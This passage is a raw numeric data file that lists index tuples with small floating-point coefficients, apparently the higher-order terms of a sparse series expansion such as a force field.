[2,2,5,6,8,9 , 1.14006853295e-11],
[2,2,5,6,10,11 , 1.39352891164e-11],
[2,2,5,7 , -1.13805469061e-09],
[2,2,5,7,7 , -1.80794553453e-11],
[2,2,5,7,7,7 , 1.19029194045e-12],
[2,2,5,7,7,9 , -6.7496495539e-13],
[2,2,5,7,8,8 , -9.00728389703e-12],
[2,2,5,7,9 , -1.49395128663e-10],
[2,2,5,7,9,9 , -8.87820186059e-12],
[2,2,5,7,10,10 , -1.03977105046e-11],
[2,2,5,7,11,11 , -1.08385715983e-11],
[2,2,5,8,8 , 1.03943982735e-10],
[2,2,5,8,8,9 , 3.20449439231e-12],
[2,2,5,8,10,11 , 5.24407473423e-12],
[2,2,5,9 , 3.51475056345e-09],
[2,2,5,9,9 , 1.00039955581e-10],
[2,2,5,9,9,9 , 2.7996180874e-12],
[2,2,5,9,10,10 , 4.90881744067e-12],
[2,2,5,9,11,11 , 5.5582219469e-12],
[2,2,5,10,10 , 1.25227738206e-10],
[2,2,5,11,11 , 1.38807786895e-10],
[2,2,6 , 8.80120171756e-20],
[2,2,6,6 , 2.23330749708e-09],
[2,2,6,6,6,6 , -4.30890670247e-12],
[2,2,6,6,6,8 , -2.68431457393e-12],
[2,2,6,6,7 , 3.92460537246e-11],
[2,2,6,6,7,7 , -2.57315368325e-12],
[2,2,6,6,7,9 , 1.34121599537e-12],
[2,2,6,6,8,8 , 1.74978868208e-11],
[2,2,6,6,9 , 3.01765263284e-10],
[2,2,6,6,9,9 , 1.68393474378e-11],
[2,2,6,6,10,10 , 2.10196191675e-11],
[2,2,6,6,11,11 , 2.08834708603e-11],
[2,2,6,7,7,8 , -5.82627371878e-13],
[2,2,6,7,8 , -2.33565805424e-10],
[2,2,6,7,8,9 , -1.3770053845e-11],
[2,2,6,7,10,11 , -1.66148697817e-11],
[2,2,6,8 , 4.26748873087e-09],
[2,2,6,8,8,8 , 1.48298407692e-12],
[2,2,6,8,9 , 9.34332578212e-11],
[2,2,6,8,9,9 , 1.3759998026e-12],
[2,2,6,8,10,10 , 4.66160090975e-12],
[2,2,6,8,11,11 , 4.94740775764e-12],
[2,2,6,9,10,11 , 4.27118607471e-12],
[2,2,6,10,11 , 1.33180432384e-10],
[2,2,7 , -1.27819926452e-07],
[2,2,7,7 , 1.06918319574e-09],
[2,2,7,7,7 , 1.30501599213e-11],
[2,2,7,7,7,7 , -1.80536579028e-12],
[2,2,7,7,7,9 , 3.23363366026e-13],
[2,2,7,7,8,8 , 1.0127189355e-11],
[2,2,7,7,9 , 1.89089710687e-10],
[2,2,7,7,9,9 , 9.54643470603e-12],
[2,2,7,7,10,10 , 1.17161276898e-11],
[2,2,7,7,11,11 , 1.20526155215e-11],
[2,2,7,8,8 , 4.7396508449e-11],
[2,2,7,8,8,9 , 4.60636853336e-12],
[2,2,7,8,10,11 , 2.33169368374e-12],
[2,2,7,9 , -1.1321264682e-09],
[2,2,7,9,9 , 4.99742301716e-11],
[2,2,7,9,9,9 , 6.7278285289e-12],
[2,2,7,9,10,10 , 3.19255158649e-12],
[2,2,7,9,11,11 , 2.61253957301e-12],
[2,2,7,10,10 , 1.96087549647e-11],
[2,2,7,11,11 , 2.15698883112e-11],
[2,2,8 , -2.20969720115e-18],
[2,2,8,8 , -5.81996475268e-08],
[2,2,8,8,8 , -1.34246760526e-20],
[2,2,8,8,8,8 , -1.12982132378e-10],
[2,2,8,8,9 , -2.506738615e-09],
[2,2,8,8,9,9 , -1.13086598601e-10],
[2,2,8,8,10,10 , -1.25338926617e-10],
[2,2,8,8,11,11 , -1.25495990537e-10],
[2,2,8,9 , -2.93657389262e-20],
[2,2,8,9,10,11 , -1.23938086037e-10],
[2,2,8,10,10 , -1.03889232046e-20],
[2,2,8,10,11 , -2.82710855224e-09],
[2,2,9 , -1.040868425e-06],
[2,2,9,9 , -5.79389171774e-08],
[2,2,9,9,9 , -2.42599039176e-09],
[2,2,9,9,9,9 , -1.25154127409e-10],
[2,2,9,9,10,10 , -1.25726350217e-10],
[2,2,9,9,11,11 , -1.27208424324e-10],
[2,2,9,10,10 , -2.79159072076e-09],
[2,2,9,11,11 , -2.83254138255e-09],
[2,2,10 , 1.7808867716e-19],
[2,2,10,10 , -6.5691021178e-08],
[2,2,10,10,10,10 , -1.34917279016e-10],
[2,2,10,10,11,11 , -1.35604981234e-10],
[2,2,10,11 , -3.55770381459e-20],
[2,2,11,11 , -6.72895909187e-08],
[2,2,11,11,11,11 , -1.4160912509e-10],
[2,3 , 1.10114283143e-20],
[2,3,3,3,4 , -5.21687319561e-11],
[2,3,3,3,4,5 , 3.05871357799e-12],
[2,3,3,3,4,7 , -3.01795503215e-12],
[2,3,3,3,4,9 , -2.15264095591e-12],
[2,3,3,3,5,10 , 1.4149688791e-12],
[2,3,3,3,6,11 , 1.21627616343e-12],
[2,3,3,3,7,10 , 2.96519271781e-13],
[2,3,3,3,8,11 , -5.22825489402e-11],
[2,3,3,3,9,10 , -5.0675037201e-11],
[2,3,3,3,10 , -9.5999387568e-10],
[2,3,4 , 4.52107354114e-08],
[2,3,4,4,4 , -5.84394894226e-11],
[2,3,4,4,4,5 , 2.66904516125e-12],
[2,3,4,4,4,7 , -2.38287963938e-12],
[2,3,4,4,4,9 , -2.08758638586e-12],
[2,3,4,4,5,10 , -3.44761885833e-13],
[2,3,4,4,6,11 , -4.43031644153e-13],
[2,3,4,4,7,10 , 7.67478935573e-13],
[2,3,4,4,8,11 , -1.40094903221e-11],
[2,3,4,4,9,10 , -1.36568760119e-11],
[2,3,4,4,10 , -2.54139338473e-10],
[2,3,4,5 , -1.89779050616e-09],
[2,3,4,5,5 , -1.22829324497e-11],
[2,3,4,5,5,5 , 1.5862825614e-12],
[2,3,4,5,5,7 , -1.66562948533e-12],
[2,3,4,5,5,9 , -2.60084772191e-13],
[2,3,4,5,6,6 , 3.69480381557e-12],
[2,3,4,5,6,8 , -9.70266855881e-14],
[2,3,4,5,7 , 6.73993637789e-12],
[2,3,4,5,7,7 , 1.88611796773e-12],
[2,3,4,5,7,9 , 4.6919803232e-13],
[2,3,4,5,8,8 , -1.02433422711e-11],
[2,3,4,5,9 , -1.82030766027e-10],
[2,3,4,5,9,9 , -1.00801798429e-11],
[2,3,4,5,10,10 , -1.12417197455e-11],
[2,3,4,5,11,11 , -1.1454226572e-11],
[2,3,4,6,6 , -1.3765590788e-11],
[2,3,4,6,6,7 , -4.15540350083e-12],
[2,3,4,6,6,9 , -7.52671691685e-13],
[2,3,4,6,7,8 , 6.34758869718e-13],
[2,3,4,6,8 , -2.93455407435e-10],
[2,3,4,6,8,9 , -1.5670640789e-11],
[2,3,4,6,10,11 , -1.72452514907e-11],
[2,3,4,7 , 2.41762315308e-09],
[2,3,4,7,7 , -5.56103562752e-12],
[2,3,4,7,7,7 , -2.12373171376e-12],
[2,3,4,7,7,9 , -7.7325184343e-13],
[2,3,4,7,8,8 , 1.19111285527e-11],
[2,3,4,7,9 , 2.01657232497e-10],
[2,3,4,7,9,9 , 1.12313083698e-11],
[2,3,4,7,10,10 , 1.29920372737e-11],
[2,3,4,7,11,11 , 1.30996705094e-11],
[2,3,4,8,8 , 8.00618924298e-11],
[2,3,4,8,8,9 , 4.63191766481e-12],
[2,3,4,8,10,11 , 8.23689175102e-13],
[2,3,4,9 , 2.26169263797e-09],
[2,3,4,9,9 , 1.08397630997e-10],
[2,3,4,9,9,9 , 5.49492647868e-12],
[2,3,4,9,10,10 , 1.11091703314e-12],
[2,3,4,9,11,11 , 8.89421719587e-13],
[2,3,4,10,10 , 3.36603310673e-12],
[2,3,4,11,11 , 1.12229070317e-12],
[2,3,5,5,5,10 , 6.47709702835e-13],
[2,3,5,5,6,11 , 8.97054755689e-13],
[2,3,5,5,7,10 , -4.32781362816e-13],
[2,3,5,5,8,11 , -7.93969037678e-12],
[2,3,5,5,9,10 , -7.78738400745e-12],
[2,3,5,5,10 , -1.46991865173e-10],
[2,3,5,6,6,10 , 9.92547985039e-13],
[2,3,5,6,7,11 , -5.24015561508e-13],
[2,3,5,6,8,10 , -1.21655008169e-11],
[2,3,5,6,9,11 , -1.22432653578e-11],
[2,3,5,6,11 , -2.3057273326e-10],
[2,3,5,7,7,10 , -6.12167217749e-14],
[2,3,5,7,8,11 , 9.44341366643e-12],
[2,3,5,7,9,10 , 9.25700675148e-12],
[2,3,5,7,10 , 1.74475510404e-10],
[2,3,5,8,8,10 , -3.23817920286e-12],
[2,3,5,8,9,11 , -2.64209971454e-12],
[2,3,5,8,11 , -8.01723584367e-11],
[2,3,5,9,9,10 , -2.35915238901e-12],
[2,3,5,9,10 , -7.37714857157e-11],
[2,3,5,10 , -2.05759901257e-09],
[2,3,5,10,10,10 , -6.17173800304e-12],
[2,3,5,10,11,11 , -5.46487828228e-12],
[2,3,6,6,6,11 , 1.4308322083e-12],
[2,3,6,6,7,10 , -3.13282743548e-13],
[2,3,6,6,8,11 , -1.90091888814e-11],
[2,3,6,6,9,10 , -1.89218459313e-11],
[2,3,6,6,10 , -3.61151999462e-10],
[2,3,6,7,7,11 , -1.85790724107e-13],
[2,3,6,7,8,10 , 1.47030315442e-11],
[2,3,6,7,9,11 , 1.44454927523e-11],
[2,3,6,7,11 , 2.81994051921e-10],
[2,3,6,8,8,11 , -1.66113420818e-12],
[2,3,6,8,9,10 , -1.14950125242e-12],
[2,3,6,8,10 , -7.47573713775e-11],
[2,3,6,9,9,11 , -5.71765502975e-13],
[2,3,6,9,11 , -5.55723406449e-11],
[2,3,6,10,10,11 , -5.9395076655e-12],
[2,3,6,11 , -2.79291443077e-09],
[2,3,6,11,11,11 , -5.38479676364e-12],
[2,3,7,7,7,10 , 3.83388221985e-13],
[2,3,7,7,8,11 , -1.11562133455e-11],
[2,3,7,7,9,10 , -1.09302007897e-11],
[2,3,7,7,10 , -2.20723101737e-10],
[2,3,7,8,8,10 , -4.03988606976e-12],
[2,3,7,8,9,11 , -4.02875015367e-12],
[2,3,7,8,11 , -5.05816812367e-11],
[2,3,7,9,9,10 , -4.83307980453e-12],
[2,3,7,9,10 , -4.7363276543e-11],
[2,3,7,10 , 1.02639961807e-09],
[2,3,7,10,10,10 , -2.4313444792e-12],
[2,3,7,10,11,11 , -1.28814936552e-12],
[2,3,8,8,8,11 , 1.09846701344e-10],
[2,3,8,8,9,10 , 1.10077973315e-10],
[2,3,8,8,10 , 2.49073830452e-09],
[2,3,8,9,9,11 , 1.09999062665e-10],
[2,3,8,9,11 , 2.48722217469e-09],
[2,3,8,10 , 1.49975289681e-19],
[2,3,8,10,10,11 , 1.20524908008e-10],
[2,3,8,11 , 5.76767060632e-08],
[2,3,8,11,11,11 , 1.19491239355e-10],
[2,3,9 , 1.04555629427e-19],
[2,3,9,9 , 1.19329075167e-20],
[2,3,9,9,9,10 , 1.09931607074e-10],
[2,3,9,9,10 , 2.4624586216e-09],
[2,3,9,10 , 5.65397771681e-08],
[2,3,9,10,10,10 , 1.20970925013e-10],
[2,3,9,10,11,11 , 1.20360072451e-10],
[2,3,9,11 , -1.23674254925e-19],
[2,3,10 , 9.9168227174e-07],
[2,3,10,10 , -1.19982547851e-20],
[2,3,10,10,10 , 2.7151923596e-09],
[2,3,10,11,11 , 2.72127566694e-09],
[2,3,11 , -5.34689547954e-19],
[2,8 , 1.40847322784e-20],
[2,9 , 1.07059626737e-20],
[3,3 , 2.29234030592e-05],
[3,3,3,3 , 1.07095902036e-08],
[3,3,3,3,3,3 , -2.35006377739e-11],
[3,3,3,3,4,4 , -4.21227532134e-12],
[3,3,3,3,4,10 , 1.4289684998e-12],
[3,3,3,3,5 , 2.42232112361e-11],
[3,3,3,3,5,5 , -1.58517912054e-12],
[3,3,3,3,5,7 , 1.65852354126e-12],
[3,3,3,3,5,9 , 5.7085700904e-14],
[3,3,3,3,6,6 , -3.80641204131e-12],
[3,3,3,3,6,8 , 1.02272388515e-12],
[3,3,3,3,7 , -2.14440401982e-12],
[3,3,3,3,7,7 , -2.75740255143e-12],
[3,3,3,3,7,9 , -1.39471887634e-12],
[3,3,3,3,8,8 , 4.75775196207e-11],
[3,3,3,3,9 , 8.5320656872e-10],
[3,3,3,3,9,9 , 4.34538359844e-11],
[3,3,3,3,10,10 , 4.75620564758e-11],
[3,3,3,3,11,11 , 4.8489024354e-11],
[3,3,4,4 , 2.65213858396e-09],
[3,3,4,4,4,4 , -3.92408734658e-12],
[3,3,4,4,4,10 , 1.25430379437e-12],
[3,3,4,4,5 , 3.09152914718e-11],
[3,3,4,4,5,5 , -1.83991898697e-12],
[3,3,4,4,5,7 , 1.69266796256e-12],
[3,3,4,4,5,9 , 8.64786239799e-13],
[3,3,4,4,6,6 , -4.25873074356e-12],
[3,3,4,4,6,8 , 1.1638185756e-12],
[3,3,4,4,7 , -2.32542991815e-11],
[3,3,4,4,7,7 , -2.04709261675e-12],
[3,3,4,4,7,9 , -1.21537025927e-12],
[3,3,4,4,8,8 , 1.22757950805e-11],
[3,3,4,4,9 , 2.29151323316e-10],
[3,3,4,4,9,9 , 1.15751594641e-11],
[3,3,4,4,10,10 , 1.29133158534e-11],
[3,3,4,4,11,11 , 1.27210688919e-11],
[3,3,4,5,5,10 , -1.43877117366e-13],
[3,3,4,5,6,11 , -2.53704389407e-13],
[3,3,4,5,7,10 , -1.73613280511e-13],
[3,3,4,5,8,11 , 9.64178759512e-12],
[3,3,4,5,9,10 , 9.47371245673e-12],
[3,3,4,5,10 , 1.73901802173e-10],
[3,3,4,6,6,10 , -2.72078738709e-13],
[3,3,4,6,7,11 , -2.35639587563e-13],
[3,3,4,6,8,10 , 1.46664814637e-11],
[3,3,4,6,9,11 , 1.45764313247e-11],
[3,3,4,6,11 , 2.72380513954e-10],
[3,3,4,7,7,10 , 5.17034515612e-13],
[3,3,4,7,8,11 , -1.11721427606e-11],
[3,3,4,7,9,10 , -1.07650653728e-11],
[3,3,4,7,10 , -1.97089767132e-10],
[3,3,4,8,8,10 , -2.74224309503e-12],
[3,3,4,8,9,11 , -3.11876802434e-12],
[3,3,4,8,11 , -5.81464478895e-11],
[3,3,4,9,9,10 , -3.590741557e-12],
[3,3,4,9,10 , -7.06591512893e-11],
[3,3,4,10 , -1.82797670985e-09],
[3,3,4,10,10,10 , 1.32800398993e-12],
[3,3,4,10,11,11 , 1.24397585768e-12],
[3,3,5 , -7.72659314388e-08],
[3,3,5,5 , -3.73156918017e-11],
[3,3,5,5,5 , 4.53839292635e-12],
[3,3,5,5,5,5 , -1.20575655739e-12],
[3,3,5,5,5,7 , 1.00356201146e-12],
[3,3,5,5,5,9 , -3.35593417012e-13],
[3,3,5,5,6,6 , -1.8501840579e-12],
[3,3,5,5,6,8 , -7.12971368814e-13],
[3,3,5,5,7 , 3.69309301696e-12],
[3,3,5,5,7,7 , -1.10058988041e-12],
[3,3,5,5,7,9 , 3.11890240602e-13],
[3,3,5,5,8,8 , 5.99632847193e-12],
[3,3,5,5,9 , 9.79589781096e-11],
[3,3,5,5,9,9 , 5.54692867132e-12],
[3,3,5,5,10,10 , 7.3899564828e-12],
[3,3,5,5,11,11 , 7.36346014907e-12],
[3,3,5,6,6 , -1.6788991631e-11],
[3,3,5,6,6,7 , 2.07850112663e-12],
[3,3,5,6,6,9 , -8.98189729351e-13],
[3,3,5,6,7,8 , 3.52129663916e-13],
[3,3,5,6,8 , 1.5924931272e-10],
[3,3,5,6,8,9 , 9.48838828117e-12],
[3,3,5,6,10,11 , 1.1927331296e-11],
[3,3,5,7 , -7.05939381078e-10],
[3,3,5,7,7 , -4.83824378888e-12],
[3,3,5,7,7,7 , 1.48526065038e-12],
[3,3,5,7,7,9 , 4.98352940244e-14],
[3,3,5,7,8,8 , -7.17049914253e-12],
[3,3,5,7,9 , -1.1752626184e-10],
[3,3,5,7,9,9 , -7.0089263821e-12],
[3,3,5,7,10,10 , -8.96479337948e-12],
[3,3,5,7,11,11 , -8.89649916785e-12],
[3,3,5,8,8 , -5.83444759794e-12],
[3,3,5,8,8,9 , -8.32892617305e-14],
[3,3,5,8,10,11 , 3.88916021527e-12],
[3,3,5,9 , -1.02596665269e-09],
[3,3,5,9,9 , -1.19700454816e-11],
[3,3,5,9,9,9 , 8.44772302296e-14],
[3,3,5,9,10,10 , 3.66979840503e-12],
[3,3,5,9,11,11 , 3.52482866157e-12],
[3,3,5,10,10 , 1.0132503124e-10],
[3,3,5,11,11 , 9.74313427328e-11],
[3,3,6,6 , 1.48071534859e-09],
[3,3,6,6,6,6 , -5.24798436089e-12],
[3,3,6,6,6,8 , -1.42011509742e-12],
[3,3,6,6,7 , 2.82856929004e-11],
[3,3,6,6,7,7 , -2.8896712322e-12],
[3,3,6,6,7,9 , 5.11206079522e-13],
[3,3,6,6,8,8 , 1.43134298469e-11],
[3,3,6,6,9 , 2.52292690521e-10],
[3,3,6,6,9,9 , 1.395061672e-11],
[3,3,6,6,10,10 , 1.80966243398e-11],
[3,3,6,6,11,11 , 1.8077643094e-11],
[3,3,6,7,7,8 , 4.31217055533e-13],
[3,3,6,7,8 , -2.07518875214e-10],
[3,3,6,7,8,9 , -1.13003156388e-11],
[3,3,6,7,10,11 , -1.41131371554e-11],
[3,3,6,8 , -1.25482372045e-09],
[3,3,6,8,8,8 , -2.46373867411e-12],
[3,3,6,8,9 , -5.25956184896e-11],
[3,3,6,8,9,9 , -2.76375487033e-12],
[3,3,6,8,10,10 , 3.56269593869e-12],
[3,3,6,8,11,11 , 3.4324247504e-12],
[3,3,6,9,10,11 , 2.91939207359e-12],
[3,3,6,10,11 , 1.02989516471e-10],
[3,3,7 , -3.90227734042e-08],
[3,3,7,7 , 1.55176942474e-09],
[3,3,7,7,7 , 1.27529882005e-11],
[3,3,7,7,7,7 , -2.39649557168e-12],
[3,3,7,7,7,9 , -1.63623402963e-13],
[3,3,7,7,8,8 , 8.13799091564e-12],
[3,3,7,7,9 , 1.7626598803e-10],
[3,3,7,7,9,9 , 8.03968607248e-12],
[3,3,7,7,10,10 , 1.03639416774e-11],
[3,3,7,7,11,11 , 1.04129383366e-11],
[3,3,7,8,8 , 1.36200714614e-10],
[3,3,7,8,8,9 , 6.48349719415e-12],
[3,3,7,8,10,11 , 1.72219582153e-12],
[3,3,7,9 , 8.49310265012e-10],
[3,3,7,9,9 , 1.07474367473e-10],
[3,3,7,9,9,9 , 7.77502675636e-12],
[3,3,7,9,10,10 , 2.68883369949e-12],
[3,3,7,9,11,11 , 2.38653144229e-12],
[3,3,7,10,10 , 1.49494061742e-11],
[3,3,7,11,11 , 1.29760142486e-11],
[3,3,8 , -1.33820617754e-18],
[3,3,8,8 , -5.30057657229e-08],
[3,3,8,8,8 , -1.0541563877e-20],
[3,3,8,8,8,8 , -1.0110320206e-10],
[3,3,8,8,9 , -2.1973688977e-09],
[3,3,8,8,9,9 , -9.78338103032e-11],
[3,3,8,8,10,10 , -1.07197100794e-10],
[3,3,8,8,11,11 , -1.06795210306e-10],
[3,3,8,9,10,11 , -1.05603102784e-10],
[3,3,8,10,11 , -2.35717361846e-09],
[3,3,9 , -8.56459413189e-07],
[3,3,9,9 , -5.05099970999e-08],
[3,3,9,9,9 , -2.10861046555e-09],
[3,3,9,9,9,9 , -1.06662473696e-10],
[3,3,9,9,10,10 , -1.06617713053e-10],
[3,3,9,9,11,11 , -1.06398036853e-10],
[3,3,9,10,10 , -2.3484935158e-09],
[3,3,9,11,11 , -2.34841593093e-09],
[3,3,10 , 3.67400540872e-20],
[3,3,10,10 , -5.47420372031e-08],
[3,3,10,10,10,10 , -1.16795275808e-10],
[3,3,10,10,11,11 , -1.15601788013e-10],
[3,3,11 , -1.63318540142e-20],
[3,3,11,11 , -5.54410862721e-08],
[3,3,11,11,11,11 , -1.18612580297e-10],
[3,4 , -3.1303535339e-20],
[3,10 , 1.98510820637e-20],
[3,11 , 1.03925736111e-20],
[4,4 , 3.22700568421e-05],
[4,4,4,4 , 7.36912532987e-09],
[4,4,4,4,4,4 , -2.26359326278e-11],
[4,4,4,4,4,10 , 3.06865333013e-12],
[4,4,4,4,5 , 8.70139532011e-11],
[4,4,4,4,5,5 , -7.70909437139e-12],
[4,4,4,4,5,7 , 8.05868751487e-12],
[4,4,4,4,5,9 , 3.44893768521e-12],
[4,4,4,4,6,6 , -2.00368256909e-11],
[4,4,4,4,6,8 , 5.33360171818e-12],
[4,4,4,4,7 , -1.38139428602e-10],
[4,4,4,4,7,7 , -7.62071995033e-12],
[4,4,4,4,7,9 , -5.15187293561e-12],
[4,4,4,4,8,8 , 2.82128755671e-11],
[4,4,4,4,9 , 5.5562911742e-10],
[4,4,4,4,9,9 , 2.68985131444e-11],
[4,4,4,4,10,10 , 2.94274897611e-11],
[4,4,4,4,11,11 , 2.99408583004e-11],
[4,4,4,5,5,10 , -1.93730407647e-13],
[4,4,4,5,6,11 , -3.92663743391e-15],
[4,4,4,5,7,10 , -1.17991042282e-12],
[4,4,4,5,8,11 , 2.32757624973e-11],
[4,4,4,5,9,10 , 2.2933304366e-11],
[4,4,4,5,10 , 4.36298422455e-10],
[4,4,4,6,6,10 , -1.9043182339e-13],
[4,4,4,6,7,11 , -1.74637746583e-12],
[4,4,4,6,8,10 , 3.54600746662e-11],
[4,4,4,6,9,11 , 3.52721147034e-11],
[4,4,4,6,11 , 6.6122786557e-10],
[4,4,4,7,7,10 , 2.95589398167e-12],
[4,4,4,7,8,11 , -2.6398403552e-11],
[4,4,4,7,9,10 , -2.55189891445e-11],
[4,4,4,7,10 , -4.68174210267e-10],
[4,4,4,8,8,10 , -7.24853945443e-12],
[4,4,4,8,9,11 , -7.83699461241e-12],
[4,4,4,8,11 , -1.50221410327e-10],
[4,4,4,9,9,10 , -8.17530733461e-12],
[4,4,4,9,10 , -1.71396282106e-10],
[4,4,4,10 , -5.97576870093e-09],
[4,4,4,10,10,10 , 3.0658973375e-12],
[4,4,4,10,11,11 , 2.17153722446e-12],
[4,4,5 , -1.56534976008e-07],
[4,4,5,5 , 2.62630207843e-09],
[4,4,5,5,5 , 2.45308223746e-11],
[4,4,5,5,5,5 , -4.84748437962e-12],
[4,4,5,5,5,7 , 4.55635683502e-12],
[4,4,5,5,5,9 , -1.0555500818e-13],
[4,4,5,5,6,6 , -9.87251396945e-12],
[4,4,5,5,6,8 , -1.0519922474e-13],
[4,4,5,5,7 , -3.07724110027e-12],
[4,4,5,5,7,7 , -5.64625853669e-12],
[4,4,5,5,7,9 , -1.03683181705e-12],
[4,4,5,5,8,8 , 1.63245514021e-11],
[4,4,5,5,9 , 3.22708066061e-10],
[4,4,5,5,9,9 , 1.61005041135e-11],
[4,4,5,5,10,10 , 1.84177942962e-11],
[4,4,5,5,11,11 , 1.85101392759e-11],
[4,4,5,6,6 , 8.75440954414e-12],
[4,4,5,6,6,7 , 1.09493301836e-11],
[4,4,5,6,6,9 , 4.54951721843e-13],
[4,4,5,6,7,8 , -8.8404337879e-13],
[4,4,5,6,8 , 4.63500674747e-10],
[4,4,5,6,8,9 , 2.55835231911e-11],
[4,4,5,6,10,11 , 2.90518801249e-11],
[4,4,5,7 , -4.09706733804e-09],
[4,4,5,7,7 , 5.06317557806e-11],
[4,4,5,7,7,7 , 5.12861645801e-12],
[4,4,5,7,7,9 , 1.48903377911e-12],
[4,4,5,7,8,8 , -1.91633321638e-11],
[4,4,5,7,9 , -3.11798552266e-10],
[4,4,5,7,9,9 , -1.83411233301e-11],
[4,4,5,7,10,10 , -2.15927107457e-11],
[4,4,5,7,11,11 , -2.19066854273e-11],
[4,4,5,8,8 , -8.51570811878e-11],
[4,4,5,8,8,9 , -5.20721813996e-12],
[4,4,5,8,10,11 , 2.05483862801e-12],
[4,4,5,9 , -4.44147956143e-09],
[4,4,5,9,9 , -1.10170086866e-10],
[4,4,5,9,9,9 , -5.36217184184e-12],
[4,4,5,9,10,10 , 1.72266896141e-12],
[4,4,5,9,11,11 , 1.50025140018e-12],
[4,4,5,10,10 , 5.78613963854e-11],
[4,4,5,11,11 , 5.61110889384e-11],
[4,4,6,6 , 7.87522611615e-09],
[4,4,6,6,6,6 , -2.60421350334e-11],
[4,4,6,6,6,8 , 7.13547955542e-13],
[4,4,6,6,7 , -1.24331117692e-11],
[4,4,6,6,7,7 , -1.2661557148e-11],
[4,4,6,6,7,9 , -2.15956632688e-12],
[4,4,6,6,8,8 , 3.8519350831e-11],
[4,4,6,6,9 , 7.13680443786e-10],
[4,4,6,6,9,9 , 3.80592167047e-11],
[4,4,6,6,10,10 , 4.36316182476e-11],
[4,4,6,6,11,11 , 4.37204070397e-11],
[4,4,6,7,7,8 , 2.88046826109e-12],
[4,4,6,7,8 , -5.37081017113e-10],
[4,4,6,7,8,9 , -2.87307015929e-11],
[4,4,6,7,10,11 , -3.33556612118e-11],
[4,4,6,8 , -4.40958658368e-09],
[4,4,6,8,8,8 , -8.12517461856e-12],
[4,4,6,8,9 , -2.01325081615e-10],
[4,4,6,8,9,9 , -1.05419468541e-11],
[4,4,6,8,10,10 , 1.40547837586e-12],
[4,4,6,8,11,11 , 1.57865185771e-12],
[4,4,6,9,10,11 , 9.96459041294e-14],
[4,4,6,10,11 , 3.25570066572e-11],
[4,4,7 , 1.11036341643e-07],
[4,4,7,7 , 2.06382047205e-09],
[4,4,7,7,7 , -7.16687859914e-12],
[4,4,7,7,7,7 , -7.40827374228e-12],
[4,4,7,7,7,9 , -2.90497398595e-12],
[4,4,7,7,8,8 , 2.13133077826e-11],
[4,4,7,7,9 , 3.94399773769e-10],
[4,4,7,7,9,9 , 2.01066324317e-11],
[4,4,7,7,10,10 , 2.49977882144e-11],
[4,4,7,7,11,11 , 2.48595684099e-11],
[4,4,7,8,8 , 1.98780209407e-10],
[4,4,7,8,8,9 , 1.11830220276e-11],
[4,4,7,8,10,11 , 2.81073141578e-12],
[4,4,7,9 , 3.09931514688e-09],
[4,4,7,9,9 , 2.15906397402e-10],
[4,4,7,9,9,9 , 1.36162111842e-11],
[4,4,7,9,10,10 , 4.27409315064e-12],
[4,4,7,9,11,11 , 3.81785083879e-12],
[4,4,7,10,10 , 3.74831041689e-11],
[4,4,7,11,11 , 3.96394418267e-11],
[4,4,8 , -8.94526349305e-19],
[4,4,8,8 , -3.99275067845e-08],
[4,4,8,8,8,8 , -7.94512897459e-11],
[4,4,8,8,9 , -1.70512448211e-09],
[4,4,8,8,9,9 , -7.63579232485e-11],
[4,4,8,8,10,10 , -8.47783303329e-11],
[4,4,8,8,11,11 , -8.46036207199e-11],
[4,4,8,9,10,11 , -8.38914690971e-11],
[4,4,8,10,11 , -1.88248317706e-09],
[4,4,9 , -5.39757031849e-07],
[4,4,9,9 , -3.96715111604e-08],
[4,4,9,9,9 , -1.63136678902e-09],
[4,4,9,9,9,9 , -7.93031113218e-11],
[4,4,9,9,10,10 , -8.46172737066e-11],
[4,4,9,9,11,11 , -8.45961638419e-11],
[4,4,9,10,10 , -1.87408291328e-09],
[4,4,9,11,11 , -1.8658365139e-09],
[4,4,10 , 5.25160427298e-20],
[4,4,10,10 , -4.30148177395e-08],
[4,4,10,10,10,10 , -9.32167616017e-11],
[4,4,10,10,11,11 , -9.1591301421e-11],
[4,4,11 , 1.3890016846e-20],
[4,4,11,11 , -4.33736036419e-08],
[4,4,11,11,11,11 , -9.74376917797e-11],
[4,5 , -1.14349447879e-20],
[4,5,5,5,5,10 , -1.65606713925e-12],
[4,5,5,5,6,11 , -1.85779402094e-12],
[4,5,5,5,7,10 , 9.03141481847e-13],
[4,5,5,5,8,11 , 1.32423086068e-11],
[4,5,5,5,9,10 , 1.33563066843e-11],
[4,5,5,5,10 , 2.60942215772e-10],
[4,5,5,6,6,10 , -2.5904097499e-12],
[4,5,5,6,7,11 , 1.4489930269e-12],
[4,5,5,6,8,10 , 2.03730616385e-11],
[4,5,5,6,9,11 , 2.06991171091e-11],
[4,5,5,6,11 , 3.82046361511e-10],
[4,5,5,7,7,10 , -4.51966901563e-13],
[4,5,5,7,8,11 , -1.5664868708e-11],
[4,5,5,7,9,10 , -1.53866348195e-11],
[4,5,5,7,10 , -2.79698256094e-10],
[4,5,5,8,8,10 , 2.43321081775e-12],
[4,5,5,8,9,11 , 1.79249479414e-12],
[4,5,5,8,11 , 6.83960428998e-11],
[4,5,5,9,9,10 , 1.38453177475e-12],
[4,5,5,9,10 , 5.33226803828e-11],
[4,5,5,10 , 2.87589942957e-10],
[4,5,5,10,10,10 , 7.50814678653e-12],
[4,5,5,10,11,11 , 6.88080450225e-12],
[4,5,6,6,6,11 , -3.62494560488e-12],
[4,5,6,6,7,10 , 1.70553175287e-12],
[4,5,6,6,8,11 , 3.16531162456e-11],
[4,5,6,6,9,10 , 3.17650128243e-11],
[4,5,6,6,10 , 5.85862472222e-10],
[4,5,6,7,7,11 , -2.40301730162e-13],
[4,5,6,7,8,10 , -2.40065987042e-11],
[4,5,6,7,9,11 , -2.38490587629e-11],
[4,5,6,7,11 , -4.50977797587e-10],
[4,5,6,8,8,11 , 1.9504917616e-12],
[4,5,6,8,9,10 , 9.60168392757e-13],
[4,5,6,8,10 , 6.55151683785e-11],
[4,5,6,9,9,11 , 3.28624052799e-13],
[4,5,6,9,11 , 3.83424407047e-11],
[4,5,6,10,10,11 , 8.75586948688e-12],
[4,5,6,11 , 1.13864041559e-09],
[4,5,6,11,11,11 , 9.03283752938e-12],
[4,5,7,7,7,10 , -1.28400606651e-12],
[4,5,7,7,8,11 , 1.81921589313e-11],
[4,5,7,7,9,10 , 1.76192722729e-11],
[4,5,7,7,10 , 3.51240260244e-10],
[4,5,7,8,8,10 , 1.4157910237e-12],
[4,5,7,8,9,11 , 1.99019282332e-12],
[4,5,7,8,11 , 5.65614187539e-12],
[4,5,7,9,9,10 , 2.48780071064e-12],
[4,5,7,9,10 , 2.25373703524e-11],
